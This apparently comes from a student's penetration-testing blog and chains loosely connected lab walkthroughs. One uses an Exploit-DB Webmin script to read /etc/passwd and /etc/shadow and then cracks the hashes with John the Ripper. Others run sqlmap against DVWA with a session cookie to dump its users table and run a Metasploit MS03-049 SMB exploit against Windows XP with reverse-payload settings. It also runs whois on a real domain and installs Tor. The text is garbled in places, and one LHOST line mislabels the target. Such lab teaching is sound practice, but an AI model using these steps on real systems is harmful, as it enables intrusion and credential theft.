Privilege Escalation guest Ubuntu in VirtualBox

I will try to search for an ID and password

in virtualbox using nessus and exploit-DB

running virtualbox on linux..

Note that the following steps ...=>
the first step we search for information gathering

Here I use the terminator # ping 192.168.56.102=> Calling is ready
# nmap 192.168.56.102=>IP address

to find out the port and version proceed as below..=>
# nmap -sV 192.168.56.102

Now we continue with the use of Nessus..:
Vulnerability Assessment < Nessus start continue go to browser Login.. => Next
Scans +add,command input...:

Status completed next Browse.

now that we have learned, now proceed with appropriate port
the scroll, i towards port 10000
=>Next

take a look at Severity select the high or medium most low..:

well ... Here you can see the synopsis, Description, Solution, See Also way
his path..

to find out if true we kan road with terminator exploitdb,such as the following..: #./searchsploit webmin

Here we knowing that in 2017,
0 => HTTP
1 => HTTPS

Usage: platfroms/multiple/remote/2017.pl (url enter IP)  (port 10000
=>knowing to go) (filename=>passwd) (target=>0=HTTP) => Next

Enter the same command only on filename that are in the substitute
/shadow 0

copy file content create a new foldercombined into one =>

now terminator : privilege escalation-offline attacks=> John the ripper
# ./john /root/expo
wait until it is finished...

:

Information Gathering is2c-dojo.com

Now I will be looking for Information on the Is2c-dojo.com
Here I am going to look for the information with active and passive..

searching Google..:

form picture website Is2c-dojo.com.....:

#whois is2c-dojo.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: IS2C-DOJO.COM
   Registrar: CV. JOGJACAMP
   Whois Server: whois.resellercamp.com
   Referral URL: http://www.resellercamp.com
   Name Server: IVAN.NS.CLOUDFLARE.COM
   Name Server: RITA.NS.CLOUDFLARE.COM
   Status: clientTransferProhibited
   Updated Date: 01-jun-2012
   Creation Date: 14-jan-2012
   Expiration Date: 14-jan-2013

Passing through the terminal..........:

Install TOR BackTrack 5

alright now we begin with TOR downloads here ...:

https://www.torproject.org/download/download-easy.html.en

completed download save to Home/DesktopExtract file,see Terminal # ls
# tar-browser-gnu-linux-i686-2.2.39-1-dev-en-US.tar.gz

If it looks like the image above, continue with Terminan..:
# cd tor-browser_en-US/
# kwrite start-tor-browser
so look like the picture below ...:

change on to complain like the picture...:
the save

finished run with using the command:
# ./start-tor-browser

What if it came out like on the pictures then wait for the upload to complete.

an upload is complete it like pictures under ...=>

Exploit DVWA File SQL Injection

Just go on the discussion ...:

Here we use encryption Tools: > Mantra > sqlmap > burp suite

do the command as below:

Activate previous menu bactrack SERVICES > mysql start >  apache start

finished in turn. New on the road right..

Activate >Mantra

so the look of firefox like this..

Go to localhost/dvwa in kan is ID: Admin Password: Password
after it entered on SQL injection as below:

Enter right sign ' click Enter so that
Error like below:

Activate foxifroxi..

to know his Cookies immediate look at =>burp suite
see below ...:

This has happened as above our new way to use the > sqlmap
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" --dbs

then specify your choice, for example on I chose 2. Enter = >

then specify your choice, for example on I chose [*] dvwa
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" -D dvwa --tables

then specify your choice, for example on I chose 2. Enter = >already in the Enter we know the Info Data bases like below ...:

afterwards we continue by selecting the users do as below:#./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" -D dvwa -T users -C user

After that we kept right on the by selecting the user..
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" -D dvwa -T users --columns

well now that we have learned how table > column and type then select one of the 6 fields continue with dumn like below ...: #./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" -D dvwa -T users --dump

now just wait for the result ... .

   so it's like this ...

Exploitasi SMB in Windows Xp use the Metasploit

If you already know the IP address, now lives we input the IP address, the following steps are ....:

now that we have learned that open 445/tcp ...

After that, we move on ... = >

# msfconsole

wait a while, maybe a little long .
Once open we use now with the new exploit =>

with our >search netapi

We know the exploit in windows then we

get right > use exploit/windows/smb/ms03_049_netapi

to see the options then
> show options

> show targets

Here we have seen OS targets. ..

> show payloads
What if we want to see in the exploitasi payloads.

                                                   > search smb

Now we look back >show options

Now we see her back configuration.
run with the..:

> set LHOST 192.168.56.101 (192.168.56.101=>IP targets)
> set LHOST 192.168.56.1 (192.168.56.1=> IP I)
> set LPORT 4444 => port to backtrack

> exploit